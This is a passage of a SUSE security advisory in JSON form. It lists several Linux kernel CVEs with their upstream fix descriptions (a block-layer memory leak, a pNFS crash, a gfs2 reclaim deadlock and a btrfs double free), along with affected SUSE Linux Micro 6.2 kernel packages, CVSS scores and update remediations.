"title": "CVE-2025-68341"
},
{
"cve": "CVE-2025-68348",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68348"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nblock: fix memory leak in __blkdev_issue_zero_pages\n\nMove the fatal signal check before bio_alloc() to prevent a memory\nleak when BLKDEV_ZERO_KILLABLE is set and a fatal signal is pending.\n\nPreviously, the bio was allocated before checking for a fatal signal.\nIf a signal was pending, the code would break out of the loop without\nfreeing or chaining the just-allocated bio, causing a memory leak.\n\nThis matches the pattern already used in __blkdev_issue_write_zeroes()\nwhere the signal check precedes the allocation.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68348",
"url": "https://www.suse.com/security/cve/CVE-2025-68348"
},
{
"category": "external",
"summary": "SUSE Bug 1255694 for CVE-2025-68348",
"url": "https://bugzilla.suse.com/1255694"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68348"
},
{
"cve": "CVE-2025-68349",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68349"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nNFSv4/pNFS: Clear NFS_INO_LAYOUTCOMMIT in pnfs_mark_layout_stateid_invalid\n\nFixes a crash when layout is null during this call stack:\n\nwrite_inode\n -\u003e nfs4_write_inode\n -\u003e pnfs_layoutcommit_inode\n\npnfs_set_layoutcommit relies on the lseg refcount to keep the layout\naround. Need to clear NFS_INO_LAYOUTCOMMIT otherwise we might attempt\nto reference a null layout.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68349",
"url": "https://www.suse.com/security/cve/CVE-2025-68349"
},
{
"category": "external",
"summary": "SUSE Bug 1255544 for CVE-2025-68349",
"url": "https://bugzilla.suse.com/1255544"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68349"
},
{
"cve": "CVE-2025-68356",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68356"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ngfs2: Prevent recursive memory reclaim\n\nFunction new_inode() returns a new inode with inode-\u003ei_mapping-\u003egfp_mask\nset to GFP_HIGHUSER_MOVABLE. This value includes the __GFP_FS flag, so\nallocations in that address space can recurse into filesystem memory\nreclaim. We don\u0027t want that to happen because it can consume a\nsignificant amount of stack memory.\n\nWorse than that is that it can also deadlock: for example, in several\nplaces, gfs2_unstuff_dinode() is called inside filesystem transactions.\nThis calls filemap_grab_folio(), which can allocate a new folio, which\ncan trigger memory reclaim. If memory reclaim recurses into the\nfilesystem and starts another transaction, a deadlock will ensue.\n\nTo fix these kinds of problems, prevent memory reclaim from recursing\ninto filesystem code by making sure that the gfp_mask of inode address\nspaces doesn\u0027t include __GFP_FS.\n\nThe \"meta\" and resource group address spaces were already using GFP_NOFS\nas their gfp_mask (which doesn\u0027t include __GFP_FS). The default value\nof GFP_HIGHUSER_MOVABLE is less restrictive than GFP_NOFS, though. To\navoid being overly limiting, use the default value and only knock off\nthe __GFP_FS flag. I\u0027m not sure if this will actually make a\ndifference, but it also shouldn\u0027t hurt.\n\nThis patch is loosely based on commit ad22c7a043c2 (\"xfs: prevent stack\noverflows from page cache allocation\").\n\nFixes xfstest generic/273.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68356",
"url": "https://www.suse.com/security/cve/CVE-2025-68356"
},
{
"category": "external",
"summary": "SUSE Bug 1255593 for CVE-2025-68356",
"url": "https://bugzilla.suse.com/1255593"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68356"
},
{
"cve": "CVE-2025-68359",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68359"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix double free of qgroup record after failure to add delayed ref head\n\nIn the previous code it was possible to incur into a double kfree()\nscenario when calling add_delayed_ref_head(). This could happen if the\nrecord was reported to already exist in the\nbtrfs_qgroup_trace_extent_nolock() call, but then there was an error\nlater on add_delayed_ref_head(). In this case, since\nadd_delayed_ref_head() returned an error, the caller went to free the\nrecord. Since add_delayed_ref_head() couldn\u0027t set this kfree\u0027d pointer\nto NULL, then kfree() would have acted on a non-NULL \u0027record\u0027 object\nwhich was pointing to memory already freed by the callee.\n\nThe problem comes from the fact that the responsibility to kfree the\nobject is on both the caller and the callee at the same time. Hence, the\nfix for this is to shift the ownership of the \u0027qrecord\u0027 object out of\nthe add_delayed_ref_head(). That is, we will never attempt to kfree()\nthe given object inside of this function, and will expect the caller to\nact on the \u0027qrecord\u0027 object on its own. The only exception where the\n\u0027qrecord\u0027 object cannot be kfree\u0027d is if it was inserted into the\ntracing logic, for which we already have the \u0027qrecord_inserted_ret\u0027\nboolean to account for this. Hence, the caller has to kfree the object\nonly if add_delayed_ref_head() reports not to have inserted it on the\ntracing logic.\n\nAs a side-effect of the above, we must guarantee that\n\u0027qrecord_inserted_ret\u0027 is properly initialized at the start of the\nfunction, not at the end, and then set when an actual insert\nhappens. This way we avoid \u0027qrecord_inserted_ret\u0027 having an invalid\nvalue on an early exit.\n\nThe documentation from the add_delayed_ref_head() has also been updated\nto reflect on the exact ownership of the \u0027qrecord\u0027 object.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
